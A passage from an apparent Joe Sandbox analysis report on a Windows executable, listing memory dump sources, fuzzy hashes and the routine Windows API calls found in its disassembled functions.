                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID: H_prolog
                                        • String ID:
                                        • API String ID: 3519838083-0
                                        • Opcode ID: 5f9c072425a50a48e59c508558ea647e3a2b10a8106058e9afff4adf0604471e
                                        • Instruction ID: f4811942ac5b76f3681003d75e48632d2b3142e6b17517d54054f8a46fadc3de
                                        • Opcode Fuzzy Hash: 5f9c072425a50a48e59c508558ea647e3a2b10a8106058e9afff4adf0604471e
                                        • Instruction Fuzzy Hash: 5AD1A3716483458FDB14DF28C884F5BBBE5FF89308F0845AEE8899B242D774E905CB56
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 554b7c61f4f4eed229f7344ed19a4ec696fce65170e00ef92dc419c12a7506a4
                                        • Instruction ID: ec94041c624a6d488e07238de8e79726f4ffce90b751c0e6c12c851c50be6c35
                                        • Opcode Fuzzy Hash: 554b7c61f4f4eed229f7344ed19a4ec696fce65170e00ef92dc419c12a7506a4
                                        • Instruction Fuzzy Hash: 59E158745083948FC314CF29D88486ABFF0EF9A300F46499EF9D497352D635EA19DBA2
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 099330c7f7ccdd417e25f555c4bfc52021962f4fe602807f6dd12a6fe714b0d5
                                        • Instruction ID: ceb05ffb5796829699a20a94bfeeec879491e13bd360f4ab9da888d180fed1fc
                                        • Opcode Fuzzy Hash: 099330c7f7ccdd417e25f555c4bfc52021962f4fe602807f6dd12a6fe714b0d5
                                        • Instruction Fuzzy Hash: ED9135B06003499BDB24EE64DCA1FFA77D5EBA0300F1409ADE996CB282DB749A45C752
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 24399a2ad99dde1ffdfe4095f328d7bde986876a5c10afdb0a2a788d37c48f2a
                                        • Instruction ID: d83fb232ed4dcba78d6f80d31a34e904756b6885fb06f6d3ccfbd19fbc1a62fc
                                        • Opcode Fuzzy Hash: 24399a2ad99dde1ffdfe4095f328d7bde986876a5c10afdb0a2a788d37c48f2a
                                        • Instruction Fuzzy Hash: 80816BB17043464BDB28DE68D8E0FBD77D4EBA1304F1009BDE9C68B682DF748A858752
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: bbed0d321ecf57a22331936bdd55ea40766087c11f3ecad6653a4e5aaa1ea124
                                        • Instruction ID: be122c03e9a44599304a73ec6967775fb18cb5aa76773238ba17dccdce2c9f05
                                        • Opcode Fuzzy Hash: bbed0d321ecf57a22331936bdd55ea40766087c11f3ecad6653a4e5aaa1ea124
                                        • Instruction Fuzzy Hash: 32617831600F0957DA389A686CD6BBEE3D4EB11390F1406DBE483DF381F691DD4A8759
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b9fa34869b2d82e3d8411e2c45cb22e435dbce3bfada8ed8319a2114c0e74f89
                                        • Instruction ID: 4103b46f1c5ed287cd57fb5396f24927dc8e72e1996bed228162c8b7783236fc
                                        • Opcode Fuzzy Hash: b9fa34869b2d82e3d8411e2c45cb22e435dbce3bfada8ed8319a2114c0e74f89
                                        • Instruction Fuzzy Hash: 33516760600F4557DF384A288596BBFE7C9DB12300F1808EBE986DB392F625ED45C3A2
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4174c036c4950e25d046357a5ac8a1c31cf2a975a4127c8a88ba0d077c7c0394
                                        • Instruction ID: 78fdd37f6b17b082dbc0c35a1e369b1ef2414e854b7463ae823e0a9e1b716889
                                        • Opcode Fuzzy Hash: 4174c036c4950e25d046357a5ac8a1c31cf2a975a4127c8a88ba0d077c7c0394
                                        • Instruction Fuzzy Hash: 0351C4315083D68FC712DF28C9404BEBFF0AE9A314F4A09EDE4D95B243C261DA4ACB52
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 011a468604b678aa2ac04b21cc319ee836b6c2bd5b5af96f7bb4e2e4dc662bbf
                                        • Instruction ID: 2f8eca818adc004a848bd48838ad05c51f336bb9f706d00a38c4f0bfff23ff65
                                        • Opcode Fuzzy Hash: 011a468604b678aa2ac04b21cc319ee836b6c2bd5b5af96f7bb4e2e4dc662bbf
                                        • Instruction Fuzzy Hash: E251DFB1A087159FC748CF19D48065AF7E1FF88314F058A2EE899E3340D735EA59CB9A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 39963e26f0f32bb957082511270cc61aa548dbbc85140380b543ac3b2cb39bde
                                        • Instruction ID: ba7bc24fd3eac1d63f7ce7dab3abe15a555a73d2d9dd7b579b9361eeef228746
                                        • Opcode Fuzzy Hash: 39963e26f0f32bb957082511270cc61aa548dbbc85140380b543ac3b2cb39bde
                                        • Instruction Fuzzy Hash: AC3128B1A147068FCB14DF28C8916AEFBE0FB95704F40896DE485C7741C774EA0ACB91
                                        APIs
                                        • _swprintf.LIBCMT ref: 00BBE30E
                                          • Part of subcall function 00BB4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00BB40A5
                                          • Part of subcall function 00BC1DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00BF1030,00000200,00BBD928,00000000,?,00000050,00BF1030), ref: 00BC1DC4
                                        • _strlen.LIBCMT ref: 00BBE32F
                                        • SetDlgItemTextW.USER32(?,00BEE274,?), ref: 00BBE38F
                                        • GetWindowRect.USER32(?,?), ref: 00BBE3C9
                                        • GetClientRect.USER32(?,?), ref: 00BBE3D5
                                        • GetWindowLongW.USER32(?,000000F0), ref: 00BBE475
                                        • GetWindowRect.USER32(?,?), ref: 00BBE4A2
                                        • SetWindowTextW.USER32(?,?), ref: 00BBE4DB
                                        • GetSystemMetrics.USER32(00000008), ref: 00BBE4E3
                                        • GetWindow.USER32(?,00000005), ref: 00BBE4EE
                                        • GetWindowRect.USER32(00000000,?), ref: 00BBE51B
                                        • GetWindow.USER32(00000000,00000002), ref: 00BBE58D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
                                        • String ID: $%s:$CAPTION$d
                                        • API String ID: 2407758923-2512411981
                                        • Opcode ID: d77ecd0635f34402baa1efbaa29ac8d4893065fd40a925f45bda33fd1d1d3cff
                                        • Instruction ID: 4e889f3b9c57282fb22ae8d56b8b9fe77631cd4254d8a589c1d8ddb38c46456f
                                        • Opcode Fuzzy Hash: d77ecd0635f34402baa1efbaa29ac8d4893065fd40a925f45bda33fd1d1d3cff
                                        • Instruction Fuzzy Hash: B881A171208341AFD710DF68CC89BAFBBE9FB89704F04491DFA95A7250D774E9058B52
                                        APIs
                                        • ___free_lconv_mon.LIBCMT ref: 00BDCB66
                                          • Part of subcall function 00BDC701: _free.LIBCMT ref: 00BDC71E
                                          • Part of subcall function 00BDC701: _free.LIBCMT ref: 00BDC730
                                          • Part of subcall function 00BDC701: _free.LIBCMT ref: 00BDC742
                                          • Part of subcall function 00BDC701: _free.LIBCMT ref: 00BDC754
                                          • Part of subcall function 00BDC701: _free.LIBCMT ref: 00BDC766
                                          • Part of subcall function 00BDC701: _free.LIBCMT ref: 00BDC778
                                          • Part of subcall function 00BDC701: _free.LIBCMT ref: 00BDC78A
                                          • Part of subcall function 00BDC701: _free.LIBCMT ref: 00BDC79C
                                          • Part of subcall function 00BDC701: _free.LIBCMT ref: 00BDC7AE
                                          • Part of subcall function 00BDC701: _free.LIBCMT ref: 00BDC7C0
                                          • Part of subcall function 00BDC701: _free.LIBCMT ref: 00BDC7D2
                                          • Part of subcall function 00BDC701: _free.LIBCMT ref: 00BDC7E4
                                          • Part of subcall function 00BDC701: _free.LIBCMT ref: 00BDC7F6
                                        • _free.LIBCMT ref: 00BDCB5B
                                          • Part of subcall function 00BD8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00BDC896,?,00000000,?,00000000,?,00BDC8BD,?,00000007,?,?,00BDCCBA,?), ref: 00BD8DE2
                                          • Part of subcall function 00BD8DCC: GetLastError.KERNEL32(?,?,00BDC896,?,00000000,?,00000000,?,00BDC8BD,?,00000007,?,?,00BDCCBA,?,?), ref: 00BD8DF4
                                        • _free.LIBCMT ref: 00BDCB7D
                                        • _free.LIBCMT ref: 00BDCB92
                                        • _free.LIBCMT ref: 00BDCB9D
                                        • _free.LIBCMT ref: 00BDCBBF
                                        • _free.LIBCMT ref: 00BDCBD2
                                        • _free.LIBCMT ref: 00BDCBE0
                                        • _free.LIBCMT ref: 00BDCBEB
                                        • _free.LIBCMT ref: 00BDCC23
                                        • _free.LIBCMT ref: 00BDCC2A
                                        • _free.LIBCMT ref: 00BDCC47
                                        • _free.LIBCMT ref: 00BDCC5F
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                        • String ID:
                                        • API String ID: 161543041-0
                                        • Opcode ID: ca18410a640f11add840cca92302b262a3de2e755bae2d35f5000568911ccd25
                                        • Instruction ID: 89558803d8916146ff2fde71882c783ad442731b6f2e17f9bc1d785065db0b29
                                        • Opcode Fuzzy Hash: ca18410a640f11add840cca92302b262a3de2e755bae2d35f5000568911ccd25
                                        • Instruction Fuzzy Hash: 4E314C3160460AAFEB20AA39D846B5AFBE9EF54311F1444ABE158D6392EF71EC40CB54
                                        APIs
                                        • _wcslen.LIBCMT ref: 00BC9736
                                        • _wcslen.LIBCMT ref: 00BC97D6
                                        • GlobalAlloc.KERNEL32(00000040,?), ref: 00BC97E5
                                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 00BC9806
                                        • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00BC982D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID: Global_wcslen$AllocByteCharCreateMultiStreamWide
                                        • String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
                                        • API String ID: 1777411235-4209811716
                                        • Opcode ID: e01aae4076b96ede2939b286ad3e26d1b8eacb8d77ac6d259b7f5ebf142018ec
                                        • Instruction ID: 5556a2d12995c9b2919b69c89e5d7ceeb2894d46dd628a0760324f91d8f61f45
                                        • Opcode Fuzzy Hash: e01aae4076b96ede2939b286ad3e26d1b8eacb8d77ac6d259b7f5ebf142018ec
                                        • Instruction Fuzzy Hash: 373123325083417BF725AB249C4AFABB7D8EF52710F14019EF501A72D2FF64DA0483A6
                                        APIs
                                        • GetWindow.USER32(?,00000005), ref: 00BCD6C1
                                        • GetClassNameW.USER32(00000000,?,00000800), ref: 00BCD6ED
                                          • Part of subcall function 00BC1FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,00BBC116,00000000,.exe,?,?,00000800,?,?,?,00BC8E3C), ref: 00BC1FD1
                                        • GetWindowLongW.USER32(00000000,000000F0), ref: 00BCD709
                                        • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 00BCD720
                                        • GetObjectW.GDI32(00000000,00000018,?), ref: 00BCD734
                                        • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 00BCD75D
                                        • DeleteObject.GDI32(00000000), ref: 00BCD764
                                        • GetWindow.USER32(00000000,00000002), ref: 00BCD76D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
                                        • String ID: STATIC
                                        • API String ID: 3820355801-1882779555
                                        • Opcode ID: ef3816252271be02e604b6d93107438b732a1f4b459c8cf988b145c8c622dedf
                                        • Instruction ID: 7829e74455cebcab23da9e344ac14220e6950ebff8f953a6b21824eb9b3684df
                                        • Opcode Fuzzy Hash: ef3816252271be02e604b6d93107438b732a1f4b459c8cf988b145c8c622dedf
                                        • Instruction Fuzzy Hash: 741102362403507BE6216B709C4AFEF76DCFB15715F008169FA41B6092DB748E0642B5
                                        APIs
                                        • _free.LIBCMT ref: 00BD9705
                                          • Part of subcall function 00BD8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00BDC896,?,00000000,?,00000000,?,00BDC8BD,?,00000007,?,?,00BDCCBA,?), ref: 00BD8DE2
                                          • Part of subcall function 00BD8DCC: GetLastError.KERNEL32(?,?,00BDC896,?,00000000,?,00000000,?,00BDC8BD,?,00000007,?,?,00BDCCBA,?,?), ref: 00BD8DF4
                                        • _free.LIBCMT ref: 00BD9711
                                        • _free.LIBCMT ref: 00BD971C
                                        • _free.LIBCMT ref: 00BD9727
                                        • _free.LIBCMT ref: 00BD9732
                                        • _free.LIBCMT ref: 00BD973D
                                        • _free.LIBCMT ref: 00BD9748
                                        • _free.LIBCMT ref: 00BD9753
                                        • _free.LIBCMT ref: 00BD975E
                                        • _free.LIBCMT ref: 00BD976C
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID: _free$ErrorFreeHeapLast
                                        • String ID:
                                        • API String ID: 776569668-0
                                        • Opcode ID: 61acd44c11175fc0a6c9ba0d2ed190772ec0e4a8af12b669e9b2e0c71984835b
                                        • Instruction ID: b9f2c9cb43ee233572a14328ac8df6c54d0706744078374f64e26626d1454200
                                        • Opcode Fuzzy Hash: 61acd44c11175fc0a6c9ba0d2ed190772ec0e4a8af12b669e9b2e0c71984835b
                                        • Instruction Fuzzy Hash: A211B97A110109BFCB01EF54C842CDD7BB6EF58351B5154E6FA084F2A2EE31DE509B84
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
